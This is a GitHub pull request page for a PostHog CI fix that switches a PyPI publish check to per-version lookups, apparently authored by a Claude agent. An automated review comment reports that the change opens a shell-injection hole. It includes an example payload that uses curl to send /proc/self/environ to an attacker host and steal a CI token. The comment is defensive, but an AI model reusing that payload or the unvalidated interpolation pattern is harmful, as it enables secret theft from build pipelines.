Skip to content

fix(ci): make hogql-parser publish robust to PyPI CDN cache lag#60643

Merged
robbie-c merged 3 commits into
masterfrom
claude/nervous-khayyam-6c9cc4
May 29, 2026
Merged

fix(ci): make hogql-parser publish robust to PyPI CDN cache lag#60643
robbie-c merged 3 commits into
masterfrom
claude/nervous-khayyam-6c9cc4

Conversation

@robbie-c
Copy link
Copy Markdown
Member

Problem

The Publish package to PyPI step in .github/workflows/build-hogql-parser-rs.yml (and identically build-hogql-parser.yml) can fail with a hard HTTP 400 on the first wheel even when that version is already on PyPI. The most recent occurrence: hogql-parser-rs 1.3.81 in PR #60226 — see run 26630162284 / job 78477339876.

The failure mode is a race against PyPI's JSON-API CDN cache, plus the workflow's own auto-pin retrigger:

  1. check-version runs curl https://pypi.org/pypi/<pkg>/json | jq -r .info.version. That endpoint is served by Fastly with Cache-Control: max-age=600, so for up to ten minutes after a successful upload the cached JSON can still report the previous version.
  2. After a successful publish, the workflow's Commit pin step pushes a tests-posthog[bot] commit (Use new hogql-parser-rs version) back to the PR branch. That push retriggers the same workflow, because GitHub's pull_request path filter evaluates the PR diff (not the latest commit's diff) and the PR overall still touches rust/hogql/parser/**.
  3. The retriggered run's check-version hits the stale JSON cache (1.3.81 PR chore(hogql): compare positions in parser shadow comparison #60226 timeline: wheel uploaded 09:41:54Z, retrigger check-version 09:43:45Z, ~100s into the cache window), sees published != local, sets parser-release-needed=true, build-wheels rebuilds, and the publish step's twine call gets a real HTTP 400 Bad Request from https://upload.pypi.org/legacy/ because the file already exists. skip-existing: false (the default) turns that into a hard step failure.

Quoted from the failing attempt-1 log:

2026-05-29T09:47:47.3126136Z Uploading distributions to https://upload.pypi.org/legacy/
2026-05-29T09:47:47.3794665Z Uploading hogql_parser_rs-1.3.81-cp312-abi3-macosx_10_12_x86_64.whl
2026-05-29T09:47:47.6802330Z WARNING  Error during upload. Retry with the --verbose option for more details.
2026-05-29T09:47:47.6808776Z ERROR    HTTPError: 400 Bad Request from https://upload.pypi.org/legacy/
2026-05-29T09:47:47.6809845Z          Bad Request

The wheel itself was uploaded by the prior, successful run 26629862904 at 09:41:54-09:42:04Z; the failing run is what auto-pin pushed and the cache race let through.

Changes

Applied identically to build-hogql-parser-rs.yml (Rust crate via maturin) and build-hogql-parser.yml (C++ wrapper via cibuildwheel), since they share the failure mode.

  1. Per-version PyPI check. Replace .info.version comparison with a per-version page lookup:

    http_code=$(curl -o /dev/null -sSL -w '%{http_code}' "https://pypi.org/pypi/<pkg>/$local/json")
    if [[ "$http_code" == '404' ]]; then
        parser_release_needed='true'
    elif [[ "$http_code" == '200' ]]; then
        # version-not-bumped comment path (unchanged)
    else
        echo "::warning::Unexpected HTTP $http_code from PyPI for <pkg> $local; assuming not yet published."
        parser_release_needed='true'
    fi

    Per-version pages have their own cache key and are invalidated on upload, so 404 vs 200 is authoritative within seconds of a successful publish (no CDN race). The unknown-status branch falls back to needs-release plus a ::warning::, so a transient PyPI 5xx doesn't silently skip an actual bump.

  2. skip-existing: true on the publish step. Belt-and-braces with the check above. If anything else ever drives the publish step toward a duplicate upload (a retried attempt, a parallel run that lost a race), twine will print "Skipping ... already exists" and the step exits 0 instead of failing the whole pipeline.

build-hogql-parser-npm.yml is intentionally not changed: it publishes to the npm registry (no PyPI JSON cache involved) and uses a separate PostHog/check-package-version action with its own version-detection mechanism. If a similar race exists there it's worth a follow-up audit, but it's not the same bug as this one.

How did you test this code?

I'm an agent and only did automated verification:

  • python3 -c "import yaml; yaml.safe_load(open(path))" on both modified files.
  • bash -n on every run: shell block in both workflows.
  • Verified the per-version PyPI endpoint contract against live pypi.org:
    • pypi.org/pypi/hogql-parser-rs/1.3.81/json → HTTP 200 (existing version)
    • pypi.org/pypi/hogql-parser-rs/99.99.99/json → HTTP 404 (missing version)
    • pypi.org/pypi/no-such-pkg-i-promise-zzz/0.0.1/json → HTTP 404 (so the "first ever publish" path correctly resolves to needs-release; this is what the deleted PyPI returns 404 until the first publish comment was guarding against)

The end-to-end behavior of the publish workflow against PyPI was not tested.

Automatic notifications

  • Publish to changelog?
  • Alert Sales and Marketing teams?

🤖 Agent context

Authored by Claude (Opus 4.7) in Claude Code, after investigation of the 1.3.81 publish failure.

Initial hypothesis was a sigstore/Rekor transient flake (the prior five bumps in the same PR succeeded, action issues #364/#376/#377 describe similar shapes). Pulling the actual attempt-1 log via the REST API (gh run view --job returns the most recent attempt's log, not a specific attempt's, so the linked job ID needed runs/<id>/attempts/1/logs to get the right zip) and cross-referencing log timestamps against the per-file upload_time_iso_8601 from pypi.org/pypi/hogql-parser-rs/1.3.81/json showed the wheel was uploaded by the prior, successful run 26629862904 at 09:41:54-09:42:04 UTC. The failing run only started its publish at 09:47:23 UTC, on the auto-pin commit pushed by the prior run, so the failure is a duplicate upload of an already-published version, not a sigstore flake.

Considered and rejected:

  • Pinning forward to pypa/gh-action-pypi-publish v1.14.0. Its changelog has no relevant fix (only verbose / print-hash default flips and dep bumps), and action issue Fix typing errors and add check #405 reports v1.14.0 regresses some callers.
  • attestations: false. Attestations were not the failure mode (Fulcio cert + 7 Rekor transparency-log entries all succeeded before the upload).
  • Marking it transient and re-running. The retrigger is structural (commit-pin push fires the workflow on every bump), so any bump can hit the same race.
  • Suppressing the retrigger entirely by appending [skip ci] to the auto-pin commit message. Orthogonal to the PyPI cache race the fix targets, and after the check-version fix the retrigger does nothing useful anyway (check-version correctly resolves to false on the auto-pin commit). Worth a separate PR if we want to save the wasted runner cycle.

robbie-c and others added 2 commits May 29, 2026 11:31
check-version reads `.info.version` from `pypi.org/pypi/<pkg>/json`,
which Fastly caches with max-age=600. For up to ten minutes after an
upload the cached JSON can still report the prior version. When the
publish step's auto-pin commit retriggers the same workflow, the new
run hits that stale cache, decides a republish is needed, and twine
hard-fails with HTTP 400 on the duplicate upload because skip-existing
is off. Latest hit: hogql-parser-rs 1.3.81 in PR #60226 (run
26630162284, job 78477339876).

Switch the check to the per-version page
(`pypi.org/pypi/<pkg>/<local>/json`), which is invalidated on upload
and so 404/200 is authoritative; 404 means needs-release, 200 means
already published, anything else logs a warning and falls back to
needs-release. Belt-and-braces, also set skip-existing: true on the
publish step so any future duplicate-upload code path is a no-op
success instead of a hard failure.

Applied identically to build-hogql-parser-rs.yml (Rust crate via
maturin) and build-hogql-parser.yml (C++ wrapper via cibuildwheel),
since they share the failure mode. build-hogql-parser-npm.yml is
unchanged: it publishes to npm via npm publish and uses a separate
PostHog/check-package-version action with its own version-detection
mechanism, so the same PyPI-JSON-API race does not apply.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Drop the multi-line rationales that referenced the fix and the prior
implementation; the remaining one-liner reads as standalone code.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@robbie-c robbie-c marked this pull request as ready for review May 29, 2026 10:50
@assign-reviewers-posthog assign-reviewers-posthog Bot requested a review from a team May 29, 2026 10:50
@greptile-apps
Copy link
Copy Markdown
Contributor

greptile-apps Bot commented May 29, 2026

Reviews (1): Last reviewed commit: "chore(ci): trim hogql-parser workflow co..." | Re-trigger Greptile

if [[ -n "$existing" ]]; then
gh api "repos/${{ github.repository }}/issues/comments/$existing" -X PATCH -f body="$message_body"
# 200 = version already on PyPI, 404 = needs release.
http_code=$(curl -o /dev/null -sSL -w '%{http_code}' "https://pypi.org/pypi/hogql-parser-rs/$local/json")
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🟡 Shell injection via PR-controlled version string in curl URL

In build-hogql-parser-rs.yml, $local is extracted from rust/hogql/parser/pyproject.toml (a PR-controlled file) via grep | sed and then embedded directly inside a double-quoted shell string on line 54:

http_code=$(curl -o /dev/null -sSL -w '%{http_code}' "https://pypi.org/pypi/hogql-parser-rs/$local/json")

If the version in pyproject.toml contains a ", the shell quoting breaks and the rest of the value executes as shell commands. For example, version = "1.0.0"$(curl -sf https://evil.example/x -d @/proc/self/environ)" makes $local = 1.0.0"$(...) and the shell expands the inner command substitution. The check-version job has no fork restriction (unlike build-wheels/publish), so any external contributor opening a fork PR against rust/hogql/parser/** can trigger this. The job has GH_TOKEN (GITHUB_TOKEN with pull-requests: write) set as an env var, which the injected command can exfiltrate. This is a regression: the old code used $local only in safe shell contexts (comparisons, string concatenation) — the URL construction is a new injection sink introduced by this PR. build-hogql-parser.yml line 51 has the identical pattern (though $local there already comes from python setup.py --version, itself PR-controlled code).

Prompt To Fix With AI
In both `.github/workflows/build-hogql-parser-rs.yml` and `.github/workflows/build-hogql-parser.yml`, add a version-format guard immediately after `$local` is assigned and before it is used in the curl URL. Valid PyPI/semver versions only contain alphanumeric characters, dots, hyphens, underscores, and `+`. Reject anything else:

```bash
# In build-hogql-parser-rs.yml, after line 50:
local=$(grep -m1 '^version = ' rust/hogql/parser/pyproject.toml | sed -E 's/version = "(.*)"/\1/')
if [[ ! "$local" =~ ^[0-9A-Za-z._+\-]+$ ]]; then
    echo "::error::Invalid version string in pyproject.toml: '$local'"
    exit 1
fi
```

Apply the same guard in `build-hogql-parser.yml` after `local=$(cd common/hogql_parser && python setup.py --version)`.

Alternatively, switch from double-quote interpolation to passing the URL as a separate argument that cannot be interpreted as shell metacharacters, but input validation is the more robust fix here since it also protects downstream uses of `$local`.

Severity: medium | Confidence: 80%

Add a workflow: pattern to the changed-files step alongside parser:,
and flip parser-release-needed=true when the YAML is the only thing
that changed. skip-existing on the publish step keeps the duplicate
upload a no-op, so a workflow edit exercises build + publish end-to-
end and catches a broken edit at PR time instead of at the next real
release.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@robbie-c robbie-c temporarily deployed to pypi-hogql-parser-rs May 29, 2026 11:01 — with GitHub Actions Inactive
@robbie-c robbie-c had a problem deploying to pypi-hogql-parser May 29, 2026 11:07 — with GitHub Actions Failure
@robbie-c robbie-c merged commit 4d35e50 into master May 29, 2026
162 of 163 checks passed
@robbie-c robbie-c deleted the claude/nervous-khayyam-6c9cc4 branch May 29, 2026 11:27
@deployment-status-posthog
Copy link
Copy Markdown

deployment-status-posthog Bot commented May 29, 2026

Deploy status

Environment Status Deployed At Workflow
dev ✅ Deployed 2026-05-29 11:56 UTC Run
prod-us ✅ Deployed 2026-05-29 12:17 UTC Run
prod-eu ✅ Deployed 2026-05-29 12:24 UTC Run

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants